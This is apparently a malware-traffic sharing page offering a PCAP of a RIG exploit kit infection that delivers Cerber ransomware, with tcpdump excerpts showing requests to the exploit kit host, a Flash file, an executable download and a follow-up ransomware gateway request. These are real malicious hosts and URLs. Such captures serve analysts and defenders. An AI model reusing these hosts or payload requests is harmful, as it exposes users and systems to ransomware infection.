
PSEUDO-DARKLEECH RIG EK Exploit Kit Delivers Cerber Ransomware PCAP file Download

Download attachment: 1 pcap (772 KB), added May 24, 2019 12:02 am by admin.

2016-12-11 16:42:13.907878 IP 10.12.10.101.49182 > 195.133.48.182.80: Flags [P.], seq 1489:2173, ack 21396, win 63936, length 684: HTTP: GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&
ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
E…..@…..
.
e..0….P.:.."..;P…….GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://acc.xrossflex.com/?sourceid=yandex&q=znvQMvXcJwDQDoDGMvrESLtEMU7QA0KK2OH_76uyEoH9JHT1vrfUSkrtt&aqs=yandex.100l87.406n0h1&ie=Windows-1
x-flash-version: 11,7,700,232
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com
Connection: Keep-Alive

2016-12-11 16:42:14.617380 IP 195.133.48.182.80 > 10.12.10.101.49182: Flags [P.], seq 21396:22747, ack 2173, win 64240, length 1351: HTTP: HTTP/1.1 200 OK
E..o.'….)…0.
.
e.P..".. ;.:./P….l..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:01 GMT
Content-Length: 13529
Content-Type: application/x-shockwave-flash
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive


2016-12-11 16:42:16.868147 IP 10.12.10.101.49185 > 195.133.48.182.80: Flags [P.], seq 1:443, ack 1, win 64240, length 442: HTTP: GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
E…..@…..
.
e..0..!.P….LD..P….N..GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com

2016-12-11 16:42:16.868305 IP 195.133.48.182.80 > 10.12.10.101.49185: Flags [.], ack 443, win 64240, length 0
E..(.7……..0.
.
e.P.!LD……P…UQ……..
2016-12-11 16:42:17.538090 IP 195.133.48.182.80 > 10.12.10.101.49183: Flags [.], seq 1:1461, ack 433, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E….:….)6..0.
.
e.P…d..6 ..P…N…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:03 GMT
Accept-Ranges: bytes
Content-Length: 276726
Content-Type: application/x-msdownload
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive

e.E…#.P1.w..p.P………….
2016-12-11 16:44:08.514628 IP 10.12.10.101.49187 > 185.69.153.226.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342: HTTP: GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1
E..~ .@…..
.
e.E…#.P1.w..p.P…;…GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ffoqr3ug7m726zou.uld7hk.top
Connection: Keep-Alive
